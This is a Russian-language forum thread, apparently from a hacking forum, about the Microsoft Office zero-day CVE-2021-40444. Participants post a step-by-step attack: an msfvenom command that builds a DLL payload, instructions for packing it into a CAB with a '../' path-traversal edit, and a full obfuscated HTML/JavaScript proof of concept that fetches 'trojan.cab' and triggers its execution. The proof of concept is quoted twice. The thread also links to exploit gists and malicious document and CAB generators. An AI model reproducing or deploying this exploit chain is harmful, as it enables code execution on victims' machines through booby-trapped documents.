Новая 0-day уязвимость используется для атак через документы Microsoft Office

Resurgentis · 10.09.2021

Payload находится в cab файле? Т.е. его надо сгенерировать каким-то образом?

Vexer2k · 10.09.2021

Resurgentis сказал(а):

Payload находится в cab файле? Т.е. его надо сгенерировать каким-то образом?

The payload is inside cab file and it must be a dll but can be anything from cobalt strike beacon to simple calc. The trick is to use "../" so when is being unloaded by IE is going to work like path traversal.

evil_tw1n · 10.09.2021

Конгениально

oknos · 10.09.2021

Vexer2k сказал(а):
It's easy dude.

First you generate a payload. For example:
Код:
msfvenom -p windows/x64/exec EXITFUNC=thread CMD=calc.exe -f dll -o '..\championship.inf'
Then you generate a cab file like this (You need lcab tool):
Код:
lcab '..\championship.inf' 1337.cab
Then you open the cab file in hex editor and you change
Код:
..\
to
Код:
../
All done easy right?

but it is a lot of effort for little success. Just use acd and we'll see the rainbow.

Vexer2k · 10.09.2021

oknos сказал(а):

but it is a lot of effort for little success. Just use acd and we'll see the rainbow.

It's all up to you. You can also get the code to execute without touching the disk.

oknos · 10.09.2021

Vexer2k сказал(а):

It's all up to you. You can also get the code to execute without touching the disk.

not my needs sir.

r1z · 10.09.2021

PoC

HTML:

<!DOCTYPE html>
<html>
 <head>
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="X-UA-Compatible" content="IE=11">
 </head>
 <body>
  <script>
function(){
  try{
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x1c747c){
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
  window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
  try{
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x5afb73){
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1['open']()['close']();
  var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
  iframeActxHtml2['open']()['close']();
  iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
  iframeActxHtml3['open']()['close']();
  var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
  iframeActxHtml4['open']()['close']();
  var actx_html_0=new ActiveXObject('htmlfile'),
  actx_html_1=new ActiveXObject('htmlfile'),
  actx_html_2=new ActiveXObject('htmlfile'),
  actx_html_3=new ActiveXObject('htmlfile'),
  actx_html_4=new ActiveXObject('htmlfile'),
  actx_html_5=new ActiveXObject('htmlfile'),
  xmlhttpreq1=new window['XMLHttpRequest'](),
  window['setTimeout']=window['setTimeout'];
  window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
  window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
  iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
  var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
  cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
  cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
  window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
  actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
  actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
}();
  </script>
 </body>
</html>

Kelegen · 10.09.2021

r1z сказал(а):

PoC

HTML:

<!DOCTYPE html>
<html>
 <head>
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="X-UA-Compatible" content="IE=11">
 </head>
 <body>
  <script>
function(){
  try{
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x1c747c){
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
  window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
  try{
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x5afb73){
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1['open']()['close']();
  var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
  iframeActxHtml2['open']()['close']();
  iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
  iframeActxHtml3['open']()['close']();
  var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
  iframeActxHtml4['open']()['close']();
  var actx_html_0=new ActiveXObject('htmlfile'),
  actx_html_1=new ActiveXObject('htmlfile'),
  actx_html_2=new ActiveXObject('htmlfile'),
  actx_html_3=new ActiveXObject('htmlfile'),
  actx_html_4=new ActiveXObject('htmlfile'),
  actx_html_5=new ActiveXObject('htmlfile'),
  xmlhttpreq1=new window['XMLHttpRequest'](),
  window['setTimeout']=window['setTimeout'];
  window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
  window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
  iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
  var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
  cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
  cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
  window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
  actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
  actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
}();
  </script>
 </body>
</html>

???

oknos · 10.09.2021

47,616 Bytes max

Kelegen · 10.09.2021

oknos · 11.09.2021

GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

CVE-2021-40444 PoC. Contribute to lockedbyte/CVE-2021-40444 development by creating an account on GitHub.

github.com

nellaisamurai · 11.09.2021

GitHub - Lagal1990/CVE-2021-40444-docx-Generate

Contribute to Lagal1990/CVE-2021-40444-docx-Generate development by creating an account on GitHub.

github.com

oknos · 12.09.2021

Exploitation

exploit:

https://gist.github.com/rxwx/5bac373f8a3c4d277d5eb4e155e8cce6

how to build the cab:

https://gist.github.com/rxwx/b134f490f36ba25eb8f69cea0de93338

malicious cab creation tool:

https://github.com/mansk1es/Caboom

Malicious document generator:

https://github.com/lockedbyte/CVE-2021-40444

Espectro · 13.09.2021

oknos сказал(а):

Exploitation

exploit:

https://gist.github.com/rxwx/5bac373f8a3c4d277d5eb4e155e8cce6

how to build the cab:

https://gist.github.com/rxwx/b134f490f36ba25eb8f69cea0de93338

malicious cab creation tool:

https://github.com/mansk1es/Caboom

Malicious document generator:

https://github.com/lockedbyte/CVE-2021-40444

?

YEUNKNOWN · 14.09.2021

oknos сказал(а):

Exploitation

exploit:

https://gist.github.com/rxwx/5bac373f8a3c4d277d5eb4e155e8cce6

how to build the cab:

https://gist.github.com/rxwx/b134f490f36ba25eb8f69cea0de93338

malicious cab creation tool:

https://github.com/mansk1es/Caboom

Malicious document generator:

https://github.com/lockedbyte/CVE-2021-40444

The first two Links is Removed! Did anyone save them?

YEUNKNOWN · 14.09.2021

The first two Links is Removed! Did anyone save them?

funnyleak · 15.09.2021

BuildCab.cs -> https://bin.privacytools.io/?0046900f2114ee1d#B4J8erWKfUZGe3nwQZzKvj3EcTtCPrKP6DTriHx1kBos
source.html -> https://bin.privacytools.io/?335fee2951c2b327#EKSnmE5TArsnf2xtWAhsDzjerAx1MMaGWQKUyM7YH4x6

b3g3m0t · 15.09.2021

YEUNKNOWN сказал(а):

The first two Links is Removed! Did anyone save them?

web archive

Новая 0-day уязвимость используется для атак через документы Microsoft Office

Resurgentis

HDD-drive

Vexer2k

X-pert

evil_tw1n

HDD-drive

oknos

ripper

Vexer2k

X-pert

oknos

ripper

r1z

Still(In)Secure

Kelegen

TOXIC

oknos

ripper

Kelegen

TOXIC

oknos

ripper

GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

nellaisamurai

HDD-drive

GitHub - Lagal1990/CVE-2021-40444-docx-Generate

oknos

ripper

Espectro

HDD-drive

YEUNKNOWN

RAID-массив

YEUNKNOWN

RAID-массив

funnyleak

CD-диск

b3g3m0t

CD-диск